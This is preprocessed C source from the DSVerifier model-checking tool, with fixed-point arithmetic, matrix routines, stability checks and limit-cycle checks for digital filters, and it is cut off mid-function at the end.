0.824555731914455f, -0.254134502966922f, 0.655609706875230f, 0.629093866184236f, -0.690033250889974f, -0.652346551677826f, 0.169820593515952f, 0.922459552232043f, 0.351812083539940f, 0.876342426613034f, -0.513486005850680f, -0.626382302780497f, -0.734690688861027f, 0.245594886018314f, -0.875740935105191f, -0.388580462918006f, 0.0127041754106421f, -0.0330962560066819f, -0.425003146474193f, 0.0281641353527495f, 0.261441358666622f, 0.949781327102773f, 0.919646340564270f, 0.504503377003781f, 0.0817071051871894f, 0.319968570729658f, 0.229065413577318f, -0.0512608414259468f, -0.0740848540944785f, -0.0974457038582892f, 0.532775710298005f, -0.492913317622840f, 0.492871078783642f, -0.289562388384881f, 0.229149968879593f, 0.697586903105899f, 0.900855243684925f, 0.969700445892771f, -0.618162745501349f, -0.533241431614228f, -0.937955908995453f, 0.886669636523452f, 0.498748076602594f, 0.974106016180519f, -0.199411214757595f, 0.725270392729083f, -0.0279932700005097f, -0.889385821767448f, -0.452211028905500f, -0.487216271217731f, -0.577105004471439f, 0.777405674160298f, 0.390121144627092f, -0.595062864225581f, -0.844712795815575f, -0.894819796738658f, 0.0556635002662202f, 0.200767245646242f, 0.481227096067452f, -0.0854169009474664f, 0.524532943920022f, -0.880292014538901f, -0.127923833629789f, -0.929275628802356f, 0.233276357260949f, -0.776272194935070f, 0.953325886548014f, -0.884399921036004f, -0.504227548828417f, -0.546526107689276f, 0.852622421886067f, 0.947722695551154f, -0.668635552599119f, 0.768739709906834f, 0.830755876586102f, -0.720579994994166f, 0.761613532216491f, 0.340510345777526f, 0.335046764810816f, 0.490102926886310f, -0.568989013749608f, -0.296018470377601f, 0.979838924243657f, 0.624231653632879f, 0.553904401851075f, -0.355359451941014f, 0.267623165480721f, 0.985914275634075f, -0.741887849211797f, 0.560479100333108f, -0.602590162007993f, -0.874870765077352f, -0.0306218773384892f, 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# 102 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/fixed-point.h"
fxp_t wrap(fxp_t kX, fxp_t kLowerBound, fxp_t kUpperBound)
{
int32_t range_size = kUpperBound - kLowerBound + 1;
if (kX < kLowerBound){
kX += range_size * ((kLowerBound - kX) / range_size + 1);
}
return kLowerBound + (kX - kLowerBound) % range_size;
}
fxp_t fxp_get_int_part(fxp_t in) {
return ((in < 0) ? -((-in) & _fxp_imask) : in & _fxp_imask);
}
fxp_t fxp_get_frac_part(fxp_t in) {
return ((in < 0) ? -((-in) & _fxp_fmask) : in & _fxp_fmask);
}
float fxp_to_float(fxp_t fxp);
fxp_t fxp_quantize(fxp_t aquant) {
if (overflow_mode == 2) {
if(aquant < _fxp_min) {
return _fxp_min;
}
else if(aquant > _fxp_max) {
return _fxp_max;
}
}
else if (overflow_mode == 3) {
if(aquant < _fxp_min || aquant > _fxp_max) {
return wrap(aquant, _fxp_min, _fxp_max);
}
}
return (fxp_t) aquant;
}
void fxp_verify_overflow(fxp_t value){
fxp_quantize(value);
printf("An Overflow Occurred in system's output");
__DSVERIFIER_assert(value <= _fxp_max && value >= _fxp_min);
}
void fxp_verify_overflow_node(fxp_t value, char* msg){
if (3 == 2)
{
printf("%s",msg);
__DSVERIFIER_assert(value <= _fxp_max && value >= _fxp_min);
}
}
void fxp_verify_overflow_array(fxp_t array[], int n){
int i=0;
for(i=0; i<n;i++){
fxp_verify_overflow(array[i]);
}
}
fxp_t fxp_int_to_fxp(int in) {
fxp_t lin;
lin = (fxp_t) in*_fxp_one;
return lin;
}
int fxp_to_int(fxp_t fxp) {
if(fxp >= 0){
fxp += _fxp_half;
} else {
fxp -= _fxp_half;
}
fxp >>= impl.frac_bits;
return (int) fxp;
}
fxp_t fxp_float_to_fxp(float f) {
fxp_t tmp;
double ftemp;
ftemp = f * scale_factor[impl.frac_bits];
if(f >= 0) {
tmp = (fxp_t)(ftemp + 0.5);
}
else {
tmp = (fxp_t)(ftemp - 0.5);
}
return tmp;
}
fxp_t fxp_double_to_fxp(double value) {
fxp_t tmp;
double ftemp = value * scale_factor[impl.frac_bits];
if (rounding_mode == 0){
if(value >= 0) {
tmp = (fxp_t)(ftemp + 0.5);
}
else {
tmp = (fxp_t)(ftemp - 0.5);
}
} else if(rounding_mode == 1){
tmp = (fxp_t) ftemp;
double residue = ftemp - tmp;
if ((value < 0) && (residue != 0)){
ftemp = ftemp - 1;
tmp = (fxp_t) ftemp;
}
} else if (rounding_mode == 0){
tmp = (fxp_t) ftemp;
}
return tmp;
}
void fxp_float_to_fxp_array(float f[], fxp_t r[], int N) {
int i;
for(i = 0; i < N; ++i) {
r[i] = fxp_float_to_fxp(f[i]);
}
}
void fxp_double_to_fxp_array(double f[], fxp_t r[], int N) {
int i;
for(i = 0; i < N; ++i) {
r[i] = fxp_double_to_fxp(f[i]);
}
}
# 275 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/fixed-point.h"
float fxp_to_float(fxp_t fxp) {
float f;
int f_int = (int) fxp;
f = f_int * scale_factor_inv[impl.frac_bits];
return f;
}
double fxp_to_double(fxp_t fxp) {
double f;
int f_int = (int) fxp;
f = f_int * scale_factor_inv[impl.frac_bits];
return f;
}
void fxp_to_float_array(float f[], fxp_t r[], int N) {
int i;
for(i = 0; i < N; ++i) {
f[i] = fxp_to_float(r[i]);
}
}
void fxp_to_double_array(double f[], fxp_t r[], int N) {
int i;
for(i = 0; i < N; ++i) {
f[i] = fxp_to_double(r[i]);
}
}
fxp_t fxp_abs(fxp_t a) {
fxp_t tmp;
tmp = ((a < 0) ? -(fxp_t)(a) : a);
tmp = fxp_quantize(tmp);
return tmp;
}
fxp_t fxp_add(fxp_t aadd, fxp_t badd) {
fxp_t tmpadd;
tmpadd = ((fxp_t)(aadd) + (fxp_t)(badd));
tmpadd = fxp_quantize(tmpadd);
return tmpadd;
}
fxp_t fxp_sub(fxp_t asub, fxp_t bsub) {
fxp_t tmpsub;
tmpsub = (fxp_t)((fxp_t)(asub) - (fxp_t)(bsub));
tmpsub = fxp_quantize(tmpsub);
return tmpsub;
}
fxp_t fxp_mult(fxp_t amult, fxp_t bmult) {
fxp_t tmpmult, tmpmultprec;
tmpmult = (fxp_t)((fxp_t)(amult)*(fxp_t)(bmult));
if (tmpmult >= 0) {
tmpmultprec = (tmpmult + ((tmpmult & 1 << (impl.frac_bits - 1)) << 1)) >> impl.frac_bits;
} else {
tmpmultprec = -(((-tmpmult) + (((-tmpmult) & 1 << (impl.frac_bits - 1)) << 1)) >> impl.frac_bits);
}
tmpmultprec = fxp_quantize(tmpmultprec);
return tmpmultprec;
}
# 372 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/fixed-point.h"
fxp_t fxp_div(fxp_t a, fxp_t b){
__DSVERIFIER_assume( b!=0 );
fxp_t tmpdiv = ((a << impl.frac_bits) / b);
tmpdiv = fxp_quantize(tmpdiv);
return tmpdiv;
}
fxp_t fxp_neg(fxp_t aneg) {
fxp_t tmpneg;
tmpneg = -(fxp_t)(aneg);
tmpneg = fxp_quantize(tmpneg);
return tmpneg;
}
# 398 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/fixed-point.h"
fxp_t fxp_sign(fxp_t a) {
return ((a == 0) ? 0 : ((a < 0) ? _fxp_minus_one : _fxp_one) );
}
fxp_t fxp_shrl(fxp_t in, int shift) {
return (fxp_t) (((unsigned int) in) >> shift);
}
fxp_t fxp_square(fxp_t a) {
return fxp_mult(a, a);
}
void fxp_print_int(fxp_t a) {
printf("\n%i", (int32_t)a);
}
void fxp_print_float(fxp_t a) {
printf("\n%f", fxp_to_float(a));
}
void fxp_print_float_array(fxp_t a[], int N) {
int i;
for(i = 0; i < N; ++i) {
printf("\n%f", fxp_to_float(a[i]));
}
}
void print_fxp_array_elements(char * name, fxp_t * v, int n){
printf("%s = {", name);
int i;
for(i=0; i < n; i++){
printf(" %jd ", v[i]);
}
printf("}\n");
}
# 23 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/dsverifier.h" 2
# 1 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/util.h" 1
# 24 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/util.h"
void initialize_array(double v[], int n){
int i;
for(i=0; i<n; i++){
v[i] = 0;
}
}
void revert_array(double v[], double out[], int n){
initialize_array(out,n);
int i;
for(i=0; i<n; i++){
out[i] = v[n-i-1];
}
}
double internal_pow(double a, double b){
int i;
double acc = 1;
for (i=0; i < b; i++){
acc = acc*a;
}
return acc;
}
double internal_abs(double a){
return a < 0 ? -a : a;
}
int fatorial(int n){
return n == 0 ? 1 : n * fatorial(n-1);
}
int check_stability(double a[], int n){
int lines = 2 * n - 1;
int columns = n;
double m[lines][n];
int i,j;
double current_stability[n];
for (i=0; i < n; i++){
current_stability[i] = a[i];
}
double sum = 0;
for (i=0; i < n; i++){
sum += a[i];
}
if (sum <= 0){
printf("[DEBUG] the first constraint of Jury criteria failed: (F(1) > 0)");
return 0;
}
sum = 0;
for (i=0; i < n; i++){
sum += a[i] * internal_pow(-1, n-1-i);
}
sum = sum * internal_pow(-1, n-1);
if (sum <= 0){
printf("[DEBUG] the second constraint of Jury criteria failed: (F(-1)*(-1)^n > 0)");
return 0;
}
if (internal_abs(a[n-1]) > a[0]){
printf("[DEBUG] the third constraint of Jury criteria failed: (abs(a0) < a_{n}*z^{n})");
return 0;
}
for (i=0; i < lines; i++){
for (j=0; j < columns; j++){
m[i][j] = 0;
}
}
for (i=0; i < lines; i++){
for (j=0; j < columns; j++){
if (i == 0){
m[i][j] = a[j];
continue;
}
if (i % 2 != 0 ){
int x;
for(x=0; x<columns;x++){
m[i][x] = m[i-1][columns-x-1];
}
columns = columns - 1;
j = columns;
}else{
m[i][j] = m[i-2][j] - (m[i-2][columns] / m[i-2][0]) * m[i-1][j];
}
}
}
int first_is_positive = m[0][0] >= 0 ? 1 : 0;
for (i=0; i < lines; i++){
if (i % 2 == 0){
int line_is_positive = m[i][0] >= 0 ? 1 : 0;
if (first_is_positive != line_is_positive){
return 0;
}
continue;
}
}
return 1;
}
void poly_sum(double a[], int Na, double b[], int Nb, double ans[], int Nans){
int i;
Nans = Na>Nb? Na:Nb;
for (i=0; i<Nans; i++){
if (Na>Nb){
ans[i]=a[i];
if (i > Na-Nb-1){
ans[i]=ans[i]+b[i-Na+Nb];
}
}else {
ans[i]=b[i];
if (i> Nb - Na -1){
ans[i]=ans[i]+a[i-Nb+Na];
}
}
}
}
void poly_mult(double a[], int Na, double b[], int Nb, double ans[], int Nans){
int i;
int j;
int k;
Nans = Na+Nb-1;
for (i=0; i<Na; i++){
for (j=0; j<Nb; j++){
k= Na + Nb - i - j - 2;
ans[k]=0;
}
}
for (i=0; i<Na; i++){
for (j=0; j<Nb; j++){
k= Na + Nb - i - j - 2;
ans[k]=ans[k]+a[Na - i - 1]*b[Nb - j - 1];
}
}
}
void double_check_oscillations(double * y, int y_size){
__DSVERIFIER_assume(y[0] != y[y_size - 1]);
int window_timer = 0;
int window_count = 0;
int i, j;
for (i = 2; i < y_size; i++){
int window_size = i;
for(j=0; j<y_size; j++){
if (window_timer > window_size){
window_timer = 0;
window_count = 0;
}
int window_index = j + window_size;
if (window_index < y_size){
if (y[j] == y[window_index]){
window_count++;
# 209 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/util.h" 3 4
((void) sizeof ((
# 209 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/util.h"
!(window_count == window_size)
# 209 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/util.h" 3 4
) ? 1 : 0), __extension__ ({ if (
# 209 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/util.h"
!(window_count == window_size)
# 209 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/util.h" 3 4
) ; else __assert_fail (
# 209 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/util.h"
"!(window_count == window_size)"
# 209 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/util.h" 3 4
, "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/util.h", 209, __extension__ __PRETTY_FUNCTION__); }))
# 209 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/util.h"
;
}
}else{
break;
}
window_timer++;
}
}
}
void double_check_limit_cycle(double * y, int y_size){
double reference = y[y_size - 1];
int idx = 0;
int window_size = 1;
for(idx = (y_size-2); idx >= 0; idx--){
if (y[idx] != reference){
window_size++;
}else{
break;
}
}
__DSVERIFIER_assume(window_size != y_size && window_size != 1);
printf("window_size %d\n", window_size);
int desired_elements = 2 * window_size;
int found_elements = 0;
for(idx = (y_size-1); idx >= 0; idx--){
if (idx > (y_size-window_size-1)){
printf("%.0f == %.0f\n", y[idx], y[idx-window_size]);
int cmp_idx = idx - window_size;
if ((cmp_idx > 0) && (y[idx] == y[idx-window_size])){
found_elements = found_elements + 2;
}else{
break;
}
}
}
printf("desired_elements %d\n", desired_elements);
printf("found_elements %d\n", found_elements);
__DSVERIFIER_assert(desired_elements != found_elements);
}
void double_check_persistent_limit_cycle(double * y, int y_size){
int idy = 0;
int count_same = 0;
int window_size = 0;
double reference = y[0];
for(idy = 0; idy < y_size; idy++){
if (y[idy] != reference){
window_size++;
} else if (window_size != 0){
break;
} else {
count_same++;
}
}
window_size += count_same;
__DSVERIFIER_assume(window_size > 1 && window_size <= y_size/2);
double lco_elements[window_size];
for(idy = 0; idy < y_size; idy++){
if (idy < window_size){
lco_elements[idy] = y[idy];
}
}
idy = 0;
int lco_idy = 0;
_Bool is_persistent = 0;
while (idy < y_size){
if(y[idy++] == lco_elements[lco_idy++]){
is_persistent = 1;
}else{
is_persistent = 0;
break;
}
if (lco_idy == window_size){
lco_idy = 0;
}
}
__DSVERIFIER_assert(is_persistent == 0);
}
void print_array_elements(char * name, double * v, int n){
printf("%s = {", name);
int i;
for(i=0; i < n; i++){
printf(" %.32f ", v[i]);
}
printf("}\n");
}
void double_add_matrix( unsigned int lines, unsigned int columns, double m1[4][4], double m2[4][4], double result[4][4]){
unsigned int i, j;
for (i = 0; i < lines; i++){
for (j = 0; j < columns; j++){
result[i][j] = m1[i][j] + m2[i][j];
}
}
}
void double_sub_matrix( unsigned int lines, unsigned int columns, double m1[4][4], double m2[4][4], double result[4][4]){
unsigned int i, j;
for (i = 0; i < lines; i++){
for (j = 0; j < columns; j++){
result[i][j] = m1[i][j] - m2[i][j];
}
}
}
void double_matrix_multiplication( unsigned int i1, unsigned int j1, unsigned int i2, unsigned int j2, double m1[4][4], double m2[4][4], double m3[4][4]){
unsigned int i, j, k;
if (j1 == i2) {
for (i=0; i<i1; i++) {
for (j=0; j<j2; j++) {
m3[i][j] = 0;
}
}
for (i=0;i<i1; i++) {
for (j=0; j<j2; j++) {
for (k=0; k<j1; k++) {
double mult = (m1[i][k] * m2[k][j]);
m3[i][j] = m3[i][j] + (m1[i][k] * m2[k][j]);
}
}
}
} else {
printf("\nError! Operation invalid, please enter with valid matrices.\n");
}
}
void fxp_matrix_multiplication( unsigned int i1, unsigned int j1, unsigned int i2, unsigned int j2, fxp_t m1[4][4], fxp_t m2[4][4], fxp_t m3[4][4]){
unsigned int i, j, k;
if (j1 == i2) {
for (i=0; i<i1; i++) {
for (j=0; j<j2; j++) {
m3[i][j] = 0;
}
}
for (i=0;i<i1; i++) {
for (j=0; j<j2; j++) {
for (k=0; k<j1; k++) {
m3[i][j] = fxp_add( m3[i][j], fxp_mult(m1[i][k] , m2[k][j]));
}
}
}
} else {
printf("\nError! Operation invalid, please enter with valid matrices.\n");
}
}
void fxp_exp_matrix(unsigned int lines, unsigned int columns, fxp_t m1[4][4], unsigned int expNumber, fxp_t result[4][4]){
unsigned int i, j, l, k;
fxp_t m2[4][4];
if(expNumber == 0){
for (i = 0; i < lines; i++){
for (j = 0; j < columns; j++){
if(i == j){
result[i][j] = fxp_double_to_fxp(1.0);
} else {
result[i][j] = 0.0;
}
}
}
return;
}
for (i = 0; i < lines; i++)
for (j = 0; j < columns; j++) result[i][j] = m1[i][j];
if(expNumber == 1){
return;
}
for(l = 1; l < expNumber; l++){
for (i = 0; i < lines; i++)
for (j = 0; j < columns; j++) m2[i][j] = result[i][j];
for (i = 0; i < lines; i++)
for (j = 0; j < columns; j++) result[i][j] = 0;
for (i=0;i<lines; i++) {
for (j=0; j<columns; j++) {
for (k=0; k<columns; k++) {
result[i][j] = fxp_add( result[i][j], fxp_mult(m2[i][k] , m1[k][j]));
}
}
}
}
}
void double_exp_matrix(unsigned int lines, unsigned int columns, double m1[4][4], unsigned int expNumber, double result[4][4]){
unsigned int i, j, k, l;
double m2[4][4];
if(expNumber == 0){
for (i = 0; i < lines; i++){
for (j = 0; j < columns; j++){
if(i == j){
result[i][j] = 1.0;
} else {
result[i][j] = 0.0;
}
}
}
return;
}
for (i = 0; i < lines; i++)
for (j = 0; j < columns; j++) result[i][j] = m1[i][j];
if(expNumber == 1){
return;
}
for(l = 1; l < expNumber; l++){
for (i = 0; i < lines; i++)
for (j = 0; j < columns; j++) m2[i][j] = result[i][j];
for (i = 0; i < lines; i++)
for (j = 0; j < columns; j++) result[i][j] = 0;
for (i=0;i<lines; i++) {
for (j=0; j<columns; j++) {
for (k=0; k<columns; k++) {
result[i][j] = result[i][j] + (m2[i][k] * m1[k][j]);
}
}
}
}
}
void fxp_add_matrix( unsigned int lines, unsigned int columns, fxp_t m1[4][4], fxp_t m2[4][4], fxp_t result[4][4]){
unsigned int i, j;
for (i = 0; i < lines; i++)
for (j = 0; j < columns; j++) {
result[i][j] = fxp_add(m1[i][j] , m2[i][j]);
}
}
void fxp_sub_matrix( unsigned int lines, unsigned int columns, fxp_t m1[4][4], fxp_t m2[4][4], fxp_t result[4][4]){
unsigned int i, j;
for (i = 0; i < lines; i++)
for (j = 0; j < columns; j++) result[i][j] = fxp_sub(m1[i][j] , m2[i][j]);
}
void print_matrix(double matrix[4][4], unsigned int lines, unsigned int columns){
printf("\nMatrix\n=====================\n\n");
unsigned int i, j;
for (i=0; i<lines; i++) {
for (j=0; j<columns; j++) {
printf("#matrix[%d][%d]: %2.2f ", i,j,matrix[i][j]);
}
printf("\n");
}
printf("\n");
}
double determinant(double a[4][4],int n)
{
int i,j,j1,j2;
double det = 0;
double m[4][4];
if (n < 1) {
} else if (n == 1) {
det = a[0][0];
} else if (n == 2) {
det = a[0][0] * a[1][1] - a[1][0] * a[0][1];
} else {
det = 0;
for (j1=0;j1<n;j1++) {
for (i=0;i<n-1;i++)
for (i=1;i<n;i++) {
j2 = 0;
for (j=0;j<n;j++) {
if (j == j1)
continue;
m[i-1][j2] = a[i][j];
j2++;
}
}
det += internal_pow(-1.0,1.0+j1+1.0) * a[0][j1] * determinant(m,n-1);
}
}
return(det);
}
double fxp_determinant(fxp_t a_fxp[4][4],int n)
{
int i,j,j1,j2;
double a[4][4];
for(i=0; i<n;i++){
for(j=0; j<n;j++){
a[i][j]= fxp_to_double(a_fxp[i][j]);
}
}
double det = 0;
double m[4][4];
if (n < 1) {
} else if (n == 1) {
det = a[0][0];
} else if (n == 2) {
det = a[0][0] * a[1][1] - a[1][0] * a[0][1];
} else {
det = 0;
for (j1=0;j1<n;j1++) {
for (i=0;i<n-1;i++)
for (i=1;i<n;i++) {
j2 = 0;
for (j=0;j<n;j++) {
if (j == j1)
continue;
m[i-1][j2] = a[i][j];
j2++;
}
}
det += internal_pow(-1.0,1.0+j1+1.0) * a[0][j1] * determinant(m,n-1);
}
}
return(det);
}
void transpose(double a[4][4], double b[4][4],int n, int m)
{
int i,j;
for (i=0;i<n;i++) {
for (j=0;j<m;j++) {
b[j][i] = a[i][j];
}
}
}
void fxp_transpose(fxp_t a[4][4], fxp_t b[4][4],int n, int m)
{
int i,j;
for (i=0;i<n;i++) {
for (j=0;j<m;j++) {
b[j][i] = a[i][j];
}
}
}
# 24 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/dsverifier.h" 2
# 1 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/functions.h" 1
# 19 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/functions.h"
extern int generic_timer;
extern hardware hw;
double generic_timing_shift_l_double(double zIn, double z[], int N) {
generic_timer += ((2 * hw.assembly.push) + (3 * hw.assembly.in) + (3 * hw.assembly.out) + (1 * hw.assembly.sbiw) + (1 * hw.assembly.cli) + (8 * hw.assembly.std));
int i;
double zOut;
zOut = z[0];
generic_timer += ((5 * hw.assembly.ldd) + (2 * hw.assembly.mov) + (4 * hw.assembly.std) + (1 * hw.assembly.ld));
generic_timer += ((2 * hw.assembly.std) + (1 * hw.assembly.rjmp));
for (i = 0; i < N - 1; i++) {
generic_timer += ((17 * hw.assembly.ldd) + (4 * hw.assembly.lsl) + (4 * hw.assembly.rol) + (2 * hw.assembly.add) + (2 * hw.assembly.adc) + (6 * hw.assembly.mov) + (2 * hw.assembly.adiw) + (5 * hw.assembly.std) + (1 * hw.assembly.ld) + (1 * hw.assembly.st) + (1 * hw.assembly.subi) + (1 * hw.assembly.sbc)+ (1 * hw.assembly.cp) + (1 * hw.assembly.cpc) + (1 * hw.assembly.brlt));
z[i] = z[i + 1];
}
z[N - 1] = zIn;
generic_timer += ((12 * hw.assembly.ldd) + (6 * hw.assembly.mov) + (3 * hw.assembly.std) + (2 * hw.assembly.lsl) + (2 * hw.assembly.rol) + (1 * hw.assembly.adc) + (1 * hw.assembly.add) + (1 * hw.assembly.subi) + (1 * hw.assembly.sbci) + (1 * hw.assembly.st) + (1 * hw.assembly.adiw) + (1 * hw.assembly.in)+ (1 * hw.assembly.cli));
generic_timer += ((3 * hw.assembly.out) + (2 * hw.assembly.pop) + (1 * hw.assembly.ret));
return (zOut);
}
double generic_timing_shift_r_double(double zIn, double z[], int N) {
generic_timer += ((2 * hw.assembly.push) + (3 * hw.assembly.in) + (3 * hw.assembly.out) + (1 * hw.assembly.sbiw) + (1 * hw.assembly.cli) + (8 * hw.assembly.std));
int i;
double zOut;
zOut = z[N - 1];
generic_timer += ((7 * hw.assembly.ldd) + (2 * hw.assembly.rol) + (2 * hw.assembly.lsl) + (2 * hw.assembly.mov) + (4 * hw.assembly.std) + (1 * hw.assembly.add) + (1 * hw.assembly.adc) + (1 * hw.assembly.ld) + (1 * hw.assembly.subi) + (1 * hw.assembly.sbci));
generic_timer += ((2 * hw.assembly.ldd) + (2 * hw.assembly.std) + (1 * hw.assembly.sbiw) + (1 * hw.assembly.rjmp));
for (i = N - 1; i > 0; i--) {
z[i] = z[i - 1];
generic_timer += ((15 * hw.assembly.ldd) + (4 * hw.assembly.lsl) + (4 * hw.assembly.rol) + (2 * hw.assembly.add) + (2 * hw.assembly.adc) + (4 * hw.assembly.mov) + (5 * hw.assembly.std) + (1 * hw.assembly.subi) + (1 * hw.assembly.sbci) + (1 * hw.assembly.ld) + (1 * hw.assembly.st) + (1 * hw.assembly.sbiw) + (1 * hw.assembly.cp) + (1 * hw.assembly.cpc) + (1 * hw.assembly.brlt));
}
z[0] = zIn;
generic_timer += ((10 * hw.assembly.ldd) + (5 * hw.assembly.mov) + (3 * hw.assembly.std) + (3 * hw.assembly.out) + (2 * hw.assembly.pop) + (1 * hw.assembly.ret) + (1 * hw.assembly.ret) + (1 * hw.assembly.cli) + (1 * hw.assembly.in) + (1 * hw.assembly.st) + (1 * hw.assembly.adiw));
return zOut;
}
fxp_t shiftL(fxp_t zIn, fxp_t z[], int N) {
int i;
fxp_t zOut;
zOut = z[0];
for (i = 0; i < N - 1; i++) {
z[i] = z[i + 1];
}
z[N - 1] = zIn;
return (zOut);
}
fxp_t shiftR(fxp_t zIn, fxp_t z[], int N) {
int i;
fxp_t zOut;
zOut = z[N - 1];
for (i = N - 1; i > 0; i--) {
z[i] = z[i - 1];
}
z[0] = zIn;
return zOut;
}
float shiftLfloat(float zIn, float z[], int N) {
int i;
float zOut;
zOut = z[0];
for (i = 0; i < N - 1; i++) {
z[i] = z[i + 1];
}
z[N - 1] = zIn;
return (zOut);
}
float shiftRfloat(float zIn, float z[], int N) {
int i;
float zOut;
zOut = z[N - 1];
for (i = N - 1; i > 0; i--) {
z[i] = z[i - 1];
}
z[0] = zIn;
return zOut;
}
double shiftRDdouble(double zIn, double z[], int N) {
int i;
double zOut;
zOut = z[0];
for (i = 0; i < N - 1; i++) {
z[i] = z[i + 1];
}
z[N - 1] = zIn;
return (zOut);
}
double shiftRdouble(double zIn, double z[], int N) {
int i;
double zOut;
zOut = z[N - 1];
for (i = N - 1; i > 0; i--) {
z[i] = z[i - 1];
}
z[0] = zIn;
return zOut;
}
double shiftLDouble(double zIn, double z[], int N) {
int i;
double zOut;
zOut = z[0];
for (i = 0; i < N - 1; i++) {
z[i] = z[i + 1];
}
z[N - 1] = zIn;
return (zOut);
}
void shiftLboth(float zfIn, float zf[], fxp_t zIn, fxp_t z[], int N) {
int i;
fxp_t zOut;
float zfOut;
zOut = z[0];
zfOut = zf[0];
for (i = 0; i < N - 1; i++) {
z[i] = z[i + 1];
zf[i] = zf[i + 1];
}
z[N - 1] = zIn;
zf[N - 1] = zfIn;
}
void shiftRboth(float zfIn, float zf[], fxp_t zIn, fxp_t z[], int N) {
int i;
fxp_t zOut;
float zfOut;
zOut = z[N - 1];
zfOut = zf[N - 1];
for (i = N - 1; i > 0; i--) {
z[i] = z[i - 1];
zf[i] = zf[i - 1];
}
z[0] = zIn;
zf[0] = zfIn;
}
int order(int Na, int Nb) {
return Na > Nb ? Na - 1 : Nb - 1;
}
void fxp_check_limit_cycle(fxp_t y[], int y_size){
fxp_t reference = y[y_size - 1];
int idx = 0;
int window_size = 1;
for(idx = (y_size-2); idx >= 0; idx--){
if (y[idx] != reference){
window_size++;
}else{
break;
}
}
__DSVERIFIER_assume(window_size != y_size && window_size != 1);
printf("window_size %d\n", window_size);
int desired_elements = 2 * window_size;
int found_elements = 0;
for(idx = (y_size-1); idx >= 0; idx--){
if (idx > (y_size-window_size-1)){
printf("%.0f == %.0f\n", y[idx], y[idx-window_size]);
int cmp_idx = idx - window_size;
if ((cmp_idx > 0) && (y[idx] == y[idx-window_size])){
found_elements = found_elements + 2;
}else{
break;
}
}
}
__DSVERIFIER_assume(found_elements > 0);
printf("desired_elements %d\n", desired_elements);
printf("found_elements %d\n", found_elements);
__DSVERIFIER_assume(found_elements == desired_elements);
__DSVERIFIER_assert(0);
}
void fxp_check_persistent_limit_cycle(fxp_t * y, int y_size){
int idy = 0;
int count_same = 0;
int window_size = 0;
fxp_t reference = y[0];
for(idy = 0; idy < y_size; idy++){
if (y[idy] != reference){
window_size++;
} else if (window_size != 0){
break;
} else {
count_same++;
}
}
window_size += count_same;
__DSVERIFIER_assume(window_size > 1 && window_size <= y_size/2);
fxp_t lco_elements[window_size];
for(idy = 0; idy < y_size; idy++){
if (idy < window_size){
lco_elements[idy] = y[idy];
}
}
idy = 0;
int lco_idy = 0;
_Bool is_persistent = 0;
while (idy < y_size){
if(y[idy++] == lco_elements[lco_idy++]){
is_persistent = 1;
}else{
is_persistent = 0;
break;
}
if (lco_idy == window_size){
lco_idy = 0;
}
}
__DSVERIFIER_assert(is_persistent == 0);
}
void fxp_check_oscillations(fxp_t y[] , int y_size){
__DSVERIFIER_assume((y[0] != y[y_size - 1]) && (y[y_size - 1] != y[y_size - 2]));
int window_timer = 0;
int window_count = 0;
int i, j;
for (i = 2; i < y_size; i++){
int window_size = i;
for(j=0; j<y_size; j++){
if (window_timer > window_size){
window_timer = 0;
window_count = 0;
}
int window_index = j + window_size;
if (window_index < y_size){
if (y[j] == y[window_index]){
window_count++;
__DSVERIFIER_assert(!(window_count == window_size));
}
}else{
break;
}
window_timer++;
}
}
}
int fxp_ln(int x) {
int t, y;
y = 0xa65af;
if (x < 0x00008000)
x <<= 16, y -= 0xb1721;
if (x < 0x00800000)
x <<= 8, y -= 0x58b91;
if (x < 0x08000000)
x <<= 4, y -= 0x2c5c8;
if (x < 0x20000000)
x <<= 2, y -= 0x162e4;
if (x < 0x40000000)
x <<= 1, y -= 0x0b172;
t = x + (x >> 1);
if ((t & 0x80000000) == 0)
x = t, y -= 0x067cd;
t = x + (x >> 2);
if ((t & 0x80000000) == 0)
x = t, y -= 0x03920;
t = x + (x >> 3);
if ((t & 0x80000000) == 0)
x = t, y -= 0x01e27;
t = x + (x >> 4);
if ((t & 0x80000000) == 0)
x = t, y -= 0x00f85;
t = x + (x >> 5);
if ((t & 0x80000000) == 0)
x = t, y -= 0x007e1;
t = x + (x >> 6);
if ((t & 0x80000000) == 0)
x = t, y -= 0x003f8;
t = x + (x >> 7);
if ((t & 0x80000000) == 0)
x = t, y -= 0x001fe;
x = 0x80000000 - x;
y -= x >> 15;
return y;
}
double fxp_log10_low(double x) {
int xint = (int) (x * 65536.0 + 0.5);
int lnum = fxp_ln(xint);
int lden = fxp_ln(655360);
return ((double) lnum / (double) lden);
}
double fxp_log10(double x) {
if (x > 32767.0) {
if (x > 1073676289.0) {
x = x / 1073676289.0;
